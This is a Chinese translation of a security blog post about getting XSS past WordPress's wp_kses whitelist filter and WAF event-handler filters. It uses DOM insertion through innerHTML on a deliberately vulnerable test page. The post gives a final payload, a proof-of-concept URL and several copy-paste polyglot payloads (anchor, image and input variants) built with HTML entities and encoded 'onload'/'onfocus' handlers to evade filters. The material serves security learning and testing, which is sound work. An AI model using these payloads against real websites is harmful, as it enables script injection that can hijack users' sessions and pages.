在一些 XSS 场景中，有一个强大的过滤器，例如WordPress 的 KSES。与许多其他过滤器一样，该过滤器使用白名单方法，仅允许对应用程序无害的 HTML。默认情况下，它只允许基本格式标签（如 <b>、<i> 等）、链接 <a href=URL>、图像 <img src=URL>、表格和其他几个具有可执行 JavaScript 属性的 HTML 元素。

不用说，不允许使用任何脚本元素或事件处理程序。任何需要 URL 的属性中都不允许使用伪协议“javascript:”。针对这些过滤器的 XSS 攻击只有 0-day 才有可能，鉴于使用这些过滤器和库的应用程序的暴露程度，该漏洞可能很快就会得到修复。

然而，由于任何安全漏洞的起源，事情可能会变得更加复杂，并且会出现错误。为了说明无论是否存在此类过滤器，XSS 漏洞仍然可能存在，我们创建了一个测试页面并发布在@BRuteLogic 的 X 时间线上。

https://brutelogic.com.br/dom/wp-search.php

您可以暂停阅读并尝试一下，然后再继续阅读。也可以与他人分享：

你能 #XSS 我吗？https://brutelogic.com.br/dom/wp-search.php #hack2learn

弹出警告框

通过一些初步的“反复试验”，我们可能会注意到 WordPress 的 wp_kses() 函数的存在。只要有了这个过滤器，就可以使用双引号突破输入元素（搜索表单）的值属性。值得注意的是，此时任何带有事件处理程序的内联注入都会被另一个过滤器避免，从而导致“[FORBIDDEN]”反射。

要关闭当前元素以注入新元素，需要一个完整的允许标签，而不仅仅是小于号（>）。

从当前元素退出后，可以添加任何允许的元素，如锚点 (<a href>)。

现在，没有任何其他帮助，这里就不可能出现 XSS。Wp_kses() 在过滤所有恶意内容方面做得很好，但正如前面指出的那样，应用程序本身可能会把事情搞得一团糟。

检查源代码，发现页面中加载了一个名为“script.js”的脚本：

它包含一个非常简短的代码：

它只获取页面的第一个锚点（数组的 [0]），并使用“innerHTML”属性将其 href 值（URL）分配给其内容。令人惊讶的是，这为通过向锚点的 href 属性中注入某些内容（wp_kses() 允许）提供了足够的空间来逃避过滤器（甚至 WAF）。

请注意，使用HTML 实体成功将 <s> 元素注入 DOM 。这是因为它是通过 linkURL() 函数的 innerHTML 插入到那里的。这足以避开 wp_kses 以及通常大多数 WAF。

虽然 <svg> 元素已成功注入，但事件处理程序触发了另一个过滤器，将“onload”替换为“[FORBIDDEN]”。所使用的有效载荷还需要进行一些编码，以避免“on.*”过滤器检测。

现在 <svg> 有效载荷已被完全注入。

最终有效载荷：

"<s><a href=//%26lt;svg/o%26%2378;load=alert(1)%26gt;>

概念验证：

https://brutelogic.com.br/dom/wp-search.php?search=XSS%22%3Cs%3E%3Ca+href=//%26lt;svg/o%26%2378;load=alert(1 )%26gt;%3E

要复制 + 粘贴的有效载荷

上述有效载荷可以优化，以在更多涉及 DOM 插入的场景中工作。它们可用于立即测试黑盒，而无需检查任何 javascript 代码。它可能对 wp_kses 和其他白名单过滤器/库有效，而且肯定对 WAF 有效。

以下多语言有效载荷可确保它会在几种可能的情况下弹出：

锚

1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt;名称=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;错误=alert(1)//%26gt; 类别=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;错误=alert(1)//%26gt; >

它使用带有编码引号和注释块的简短多语言。点击此处了解有关多语言技巧的更多信息。它还将有效载荷喷洒到元素的几个常见属性上。使用“tel:”方案是因为它很短，并且最适合使用 href 加单斜杠（但有些页面可能要求带或不带双斜杠的“https:”）。

这是一个很长的向量，但这不是问题，因为它主要是 HTML 编码的（通常被过滤器容忍）。除了强制性的“href”属性外，其他一些属性可以随意省略。

更多有效载荷：

图像

1'"<S><Img Src=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; Alt=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt;名称 = tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; 类别 = tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >

输入

1'"<S><输入值=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt;名称=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt;类别=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; PlaceHolder=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;A/HRef/AutoFocus/*/O%26%2378;Focus=alert(1)//%26gt; >

所有这些有效载荷都与原生“id”属性配合使用效果最佳：通常在像上面这样的易受攻击的 javascript 代码中，元素数组的第一个元素不会被拾取。尽管对于所有类似元素，document.getElementsByTagName(element) 函数可能会在野外发生（特别是对于具有大量动态检索链接的页面），但 document.getElementById(id) 函数更有可能在源代码中找到属性“id”的值时出现。

由于无法喷射“id”属性，因此需要添加该属性才能针对此类易受攻击的情况进行有针对性的利用。另一方面，添加的“class”属性支持使用页面中找到的所有类名进行喷射技术，因为它可以接受多个值。

译：https://brutelogic.com.br/blog/bypassing-whitelists-with-xss-payloads-in-attributes/